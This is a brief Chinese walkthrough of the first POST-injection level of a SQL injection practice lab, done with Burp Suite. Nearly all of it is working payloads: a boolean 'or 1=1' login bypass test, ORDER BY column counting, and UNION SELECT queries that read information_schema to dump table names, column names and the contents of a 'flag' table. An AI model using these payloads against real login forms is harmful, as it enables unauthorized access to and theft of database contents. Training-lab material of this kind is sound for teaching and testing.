sql_lab之sqli中的post注入

Post注入

用burpsuit抓包去做

Post第一关:(gxa5)

1.判断是否存在注入

username=1'or 1=1 #&password=123&submit=%E7%99%BB%E5%BD%95 有回显

username=1'or 1=2 #&password=123&submit=%E7%99%BB%E5%BD%95 没有回显

则证明存在sql注入

2.判断字段数

username=1'or 1=1 order by 4 #&password=123&submit=%E7%99%BB%E5%BD%95 没有回显

username=1'or 1=1 order by 3 #&password=123&submit=%E7%99%BB%E5%BD%95 有回显

则证明字段数是3

3.用union查询判断回显点

username=1'union select 1,2,3 -- a&password=123&submit=%E7%99%BB%E5%BD%95

4.查出当前数据库名

username=1'union select 1,database(),3 -- a&password=123&submit=%E7%99%BB%E5%BD%95

5.查询当前数据库中的表名

username=1'union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security' -- a&password=123&submit=%E7%99%BB%E5%BD%95

6.查询flag表中的字段名

username=1'union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='flag' -- a&password=123&submit=%E7%99%BB%E5%BD%95

7.查字段里面的数据

username=1'union select 1,group_concat(id),group_concat(flag) from flag -- a&password=123&submit=%E7%99%BB%E5%BD%95

你可能感兴趣的:(sql,数据库,oracle)